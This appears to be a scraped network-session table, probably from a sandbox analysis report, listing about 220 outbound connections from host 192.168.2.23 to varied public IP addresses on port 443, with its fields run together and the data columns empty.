                                                23271192.168.2.2358118134.1.75.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23272192.168.2.2346880209.28.53.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23273192.168.2.2344600130.161.150.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23274192.168.2.235426420.128.85.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23275192.168.2.235370013.85.119.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23276192.168.2.2339718176.171.153.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23277192.168.2.2334426159.177.182.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23278192.168.2.2344284124.9.162.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23279192.168.2.235722086.212.27.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23280192.168.2.233968857.79.23.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23281192.168.2.2341338212.227.252.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23282192.168.2.2342050104.221.212.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23283192.168.2.2346972106.99.85.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23284192.168.2.2353970213.28.69.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23285192.168.2.235597020.102.251.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23286192.168.2.235555892.157.228.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23287192.168.2.2345808145.248.54.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23288192.168.2.234482853.27.14.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23289192.168.2.2334398172.48.63.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23290192.168.2.2342012184.33.183.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23291192.168.2.2337804177.228.203.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23292192.168.2.2341016213.94.161.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23293192.168.2.2354890119.42.238.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23294192.168.2.235876236.79.101.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23295192.168.2.2352598175.30.55.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23296192.168.2.2341022170.29.146.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23297192.168.2.236013245.178.219.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23298192.168.2.2343426110.53.97.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23299192.168.2.233447664.13.216.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23300192.168.2.2357856192.157.152.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23301192.168.2.23547104.165.243.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23302192.168.2.2336278101.136.88.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23303192.168.2.2354740118.237.215.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23304192.168.2.234440646.76.177.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23305192.168.2.234264640.194.25.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23306192.168.2.2347674105.199.127.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23307192.168.2.235721294.96.179.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23308192.168.2.233425217.45.151.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23309192.168.2.2333352140.19.85.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23310192.168.2.2337804173.179.137.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23311192.168.2.233861281.60.236.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23312192.168.2.2334586155.89.40.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23313192.168.2.235616076.210.115.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23314192.168.2.23410044.201.127.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23315192.168.2.2348226150.247.33.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23316192.168.2.234252838.24.138.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23317192.168.2.2352060184.100.77.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23318192.168.2.2353214107.46.1.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23319192.168.2.2353408149.123.227.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23320192.168.2.2335388105.104.233.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23321192.168.2.2345848209.161.4.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23322192.168.2.234015031.22.38.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23323192.168.2.2347336202.229.33.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23324192.168.2.233938471.209.0.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23325192.168.2.235437095.91.229.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23326192.168.2.2352606223.237.240.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23327192.168.2.234442271.218.152.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23328192.168.2.234737443.14.227.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23329192.168.2.233547014.128.218.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23330192.168.2.233427419.140.186.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23331192.168.2.2356812167.99.156.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23332192.168.2.2359116152.249.93.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23333192.168.2.2352578123.127.191.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23334192.168.2.233836893.38.64.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23335192.168.2.236008297.51.209.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23336192.168.2.233450846.119.64.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23337192.168.2.2332906178.193.231.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23338192.168.2.234226847.196.22.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23339192.168.2.234632876.172.58.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23340192.168.2.2340212204.218.201.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23341192.168.2.2339560142.76.77.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23342192.168.2.235182842.188.53.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23343192.168.2.2360094108.35.197.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23344192.168.2.2347852121.115.79.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23345192.168.2.2359336135.92.106.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23346192.168.2.2343450180.152.163.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23347192.168.2.2342026135.224.201.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23348192.168.2.234451419.103.199.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23349192.168.2.2341404140.62.72.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23350192.168.2.2349210222.240.89.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23351192.168.2.234994438.75.19.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23352192.168.2.2335822122.124.72.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23353192.168.2.2340646196.168.239.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23354192.168.2.235858499.70.178.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23355192.168.2.2359444184.13.58.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23356192.168.2.2341662192.25.232.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23357192.168.2.2334522133.17.182.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23358192.168.2.2346656139.155.25.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23359192.168.2.2340720152.152.90.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23360192.168.2.2339656107.189.99.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23361192.168.2.2334000195.54.78.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23362192.168.2.2336994182.5.53.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23363192.168.2.2338214105.155.66.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23364192.168.2.233385642.39.216.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23365192.168.2.234002090.52.121.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23366192.168.2.235025867.233.202.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23367192.168.2.2337838113.108.45.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23368192.168.2.235112672.95.234.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23369192.168.2.2357728195.161.187.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23370192.168.2.2347716119.11.236.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23371192.168.2.2354888156.160.118.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23372192.168.2.23414845.141.14.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23373192.168.2.234253234.234.1.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23374192.168.2.235956066.144.163.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23375192.168.2.234995090.155.149.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23376192.168.2.2346944103.168.164.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23377192.168.2.2359912111.83.151.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23378192.168.2.233516640.202.60.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23379192.168.2.235765090.243.125.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23380192.168.2.233372435.252.194.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23381192.168.2.234483259.33.116.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23382192.168.2.234418884.50.39.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23383192.168.2.2335654209.83.93.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23384192.168.2.2359442109.220.208.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23385192.168.2.234785417.169.96.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23386192.168.2.2359596115.25.216.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23387192.168.2.233387225.183.102.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23388192.168.2.234926279.1.44.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23389192.168.2.2360698155.232.156.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23390192.168.2.233667835.48.25.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23391192.168.2.235557831.136.227.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23392192.168.2.234962249.217.118.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23393192.168.2.235600069.71.23.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23394192.168.2.235897469.220.149.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23395192.168.2.2348268160.252.43.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23396192.168.2.235024896.243.56.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23397192.168.2.234968441.155.4.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23398192.168.2.234294691.90.183.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23399192.168.2.2345172155.81.213.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23400192.168.2.235281677.190.20.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23401192.168.2.23357108.168.57.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23402192.168.2.2337300183.33.232.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23403192.168.2.2336048221.189.241.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23404192.168.2.234796017.231.42.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23405192.168.2.233435080.37.129.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23406192.168.2.2341500209.224.143.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23407192.168.2.234894290.38.52.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23408192.168.2.233629864.22.143.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23409192.168.2.2338034143.54.166.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23410192.168.2.234200278.254.151.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23411192.168.2.234217872.186.139.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23412192.168.2.2346206185.95.131.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23413192.168.2.2345736168.198.213.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23414192.168.2.234226061.86.208.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23415192.168.2.234675083.39.127.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23416192.168.2.233897699.253.207.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23417192.168.2.2354880185.232.223.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23418192.168.2.2353676187.5.232.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23419192.168.2.235878480.133.144.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23420192.168.2.2358504139.140.227.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23421192.168.2.2343794157.72.195.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23422192.168.2.2344098106.108.229.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23423192.168.2.2334350101.65.43.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23424192.168.2.2350058201.22.128.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23425192.168.2.2351172155.103.185.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23426192.168.2.2358310120.208.193.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23427192.168.2.235689279.22.206.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23428192.168.2.2336318128.189.73.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23429192.168.2.23531225.40.158.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23430192.168.2.235799413.18.131.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23431192.168.2.2334316204.36.98.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23432192.168.2.234973859.75.39.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23433192.168.2.2359758106.183.130.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23434192.168.2.233838641.64.247.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23435192.168.2.2334100191.7.201.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23436192.168.2.235988245.193.237.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23437192.168.2.2341196129.177.13.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23438192.168.2.2350470113.145.53.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23439192.168.2.2358758208.239.80.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23440192.168.2.233453027.92.62.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23441192.168.2.234070447.113.88.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23442192.168.2.235755069.177.234.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23443192.168.2.2342388220.35.245.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23444192.168.2.235201292.103.233.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23445192.168.2.234076014.24.225.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23446192.168.2.2349438188.52.46.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23447192.168.2.2335222101.118.180.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23448192.168.2.2358622116.116.57.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23449192.168.2.2357530217.233.187.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23450192.168.2.2350172111.251.243.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23451192.168.2.2337130193.129.142.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23452192.168.2.234712439.103.159.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23453192.168.2.2347526118.159.100.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23454192.168.2.235315280.122.35.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23455192.168.2.2345142165.199.194.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23456192.168.2.2345530129.134.247.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23457192.168.2.2352220155.136.34.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23458192.168.2.233947692.219.14.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23459192.168.2.233511844.154.97.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23460192.168.2.2355848210.105.76.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23461192.168.2.235575287.26.57.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23462192.168.2.2355184137.5.103.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23463192.168.2.2348636124.125.19.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23464192.168.2.2357822169.47.97.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23465192.168.2.2354052204.209.134.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23466192.168.2.235089291.196.221.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23467192.168.2.233388891.110.178.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23468192.168.2.2359636113.125.146.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23469192.168.2.2332924179.101.43.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23470192.168.2.2355518204.68.251.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23471192.168.2.2346010138.186.118.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23472192.168.2.2337246104.242.67.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23473192.168.2.2359380172.49.191.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23474192.168.2.235086820.144.245.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23475192.168.2.2342268156.142.222.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23476192.168.2.23475101.111.195.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23477192.168.2.2339988210.76.189.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23478192.168.2.2359848183.43.37.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23479192.168.2.2352602149.202.232.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23480192.168.2.2355794166.228.167.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23481192.168.2.2340172115.33.144.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23482192.168.2.234013869.18.27.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23483192.168.2.2353328194.249.212.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23484192.168.2.2354764202.55.250.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23485192.168.2.235465044.41.246.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23486192.168.2.234180270.139.253.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23487192.168.2.235530886.17.209.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23488192.168.2.2347666196.224.190.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23489192.168.2.235575291.9.147.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23490192.168.2.234343672.195.46.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23491192.168.2.235829618.211.86.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23492192.168.2.2351536113.218.188.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
